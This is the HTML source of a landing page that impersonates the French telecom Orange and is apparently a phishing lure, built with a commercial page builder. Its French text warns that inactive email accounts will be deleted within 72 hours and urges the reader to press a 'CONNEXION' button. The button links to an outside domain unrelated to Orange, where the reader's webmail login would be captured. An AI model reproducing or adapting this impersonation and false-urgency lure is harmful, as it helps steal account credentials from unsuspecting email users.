        visitToken: 'def50200062963020061b9be7602c6df9e46cb58ac9e285a03b8924301e8db8ea12e92f28f011e0530ec2711d2fc0aa4938900ee577d47943e0ae1e3558f1e63c0e2267306a22989fdd6847d9d9433b41e69344639fcb497024b2301335d21607030ac9d0b01c486bab196e5d135bdb5c1108b740499d3c10cb4efbe2ca5c642a869dd4e24ee5f19b6edd5693292b04282f0a104d5718ffca1e2ad96bd991d9e51093c012c',
                isFreemium: null === '1',
            };
</script>


<script type="text/javascript">
    if (grLpsInitialData) {
        grLpsInitialData.tracking_codes = {"google_analytics":[],"kiss_metrics":[],"yandex_metrica":[],"mixpanel":[],"vwo":[],"facebook_pixel":[],"bing_ads":[],"google_tag_manager":[]};
    } else {
        var grLpsInitialData = {
            tracking_codes: {"google_analytics":[],"kiss_metrics":[],"yandex_metrica":[],"mixpanel":[],"vwo":[],"facebook_pixel":[],"bing_ads":[],"google_tag_manager":[]}
        }
    }
</script>
</head>

    
                        <body xmlns="http://www.w3.org/1999/xhtml" data-widget="arena" data-variant-id="0" id="body-2swae8p" data-uid="body-2swae8p" data-draggable="false" class="" data-viewing-mode="desktop" data-workspace-phone-width="400" data-optimize-phone="true" data-workspace-desktop-width="980"><div id="OPT" hidden="true">
        <form action="#" method="post">
            <div>
                <input type="hidden" name="template_id" value="208|1" />
            <select name="GoogleWebFont" data-initial-load="true"></select></div>
        </form>
    </div><section data-section="section" id="section-8d1krxh" data-uid="section-8d1krxh" class="" data-draggable="true">
    	<div data-section="wrap" data-reverse="true">
            
            
            

            

            

            

            

    	<div data-editable="multimedia:image" id="edi-6q1n083" data-uid="edi-6q1n083" class="" data-draggable="true" style="background: rgba(0, 0, 0, 0) none repeat scroll 0% 0%;">
    
<img src="https://us-ms.gr-cdn.com/getresponse-Qk5WR/photos/f42be118-86c4-4237-afb7-ed991a9953dd.png" alt="" width="550" height="553" /></div><div data-editable="text" id="edi-f2plr3u" data-uid="edi-f2plr3u" class="" data-draggable="true">
    <div class="text-content" dir="auto"><span style="color: rgb(237, 157, 17);">Orange</span><br /><br />Société anonyme au capital de 10 640 226 396 euros<br /><div>RCS Nanterre 380 129 866</div><div><br /></div><div><span style="font-weight: bold;">Siège social</span></div><div><span style="font-weight: bold;"></span><br />111, quai du Président Roosevelt<br />92130 ISSY-LES-MOULINEAUX<br />et domiciliée pour les besoins des présentes<br />1 avenue Nelson Mandela<br />94745 ARCUEIL<br />Télephone : +33 1 44 44 22 22 <br /></div></div>
</div><div data-editable="button" id="edi-41f4ysd" data-uid="edi-41f4ysd" class="selected-component resizing-mode active" data-draggable="true" data-initialized="true" data-product-url=""><a href="https://authen-messagerie-web.frge.io" data-url="https://authen-messagerie-web.frge.io" data-link-type="web" title="" target="_blank"></a><button type="button"><div>CONNEXION</div></button></div><div data-editable="text" id="edi-efhqg3w" data-uid="edi-efhqg3w" class="" data-draggable="true">
    <div class="text-content" dir="auto"><br /><div>Nos serveurs ont constaté de nombreux emails inactifs. <br /></div><div><br /></div><div>Afin de procéder à une mise à jour de tous les emails inactifs,veuillez vous connectez via le</div><div><br /></div><div> lien ci-dessous pour que nos serveurs vous enregistrent comme étant actifs.</div><div><br /></div>un délai de 72h est fixé avant la suppression de tous les emails inactifs.</div>
</div><div data-editable="text" id="edi-kf4it45" data-uid="edi-kf4it45" class="" data-draggable="true">
    <div class="text-content" dir="auto"><span style="font-weight: bold;">Monsieur, Madame,</span></div>
</div></div>
    </section>
        <script src="https://us-as.gr-cdn.com/javascripts/core/lps/dist/manifest.86c981ff4636248e3a87.js"></script>
        <script src="https://us-as.gr-cdn.com/javascripts/core/lps/dist/vendor.chunk.b68661c170ee7e096aab.js"></script>
        <script src="https://us-as.gr-cdn.com/javascripts/core/lps/dist/show.chunk.f0c005a1a25258e1d828.js"></script>
                

    </body>
    
    </html>
